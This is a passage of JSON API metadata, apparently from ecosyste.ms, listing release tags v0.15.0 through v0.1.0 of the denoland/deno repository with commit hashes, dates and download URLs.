2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denola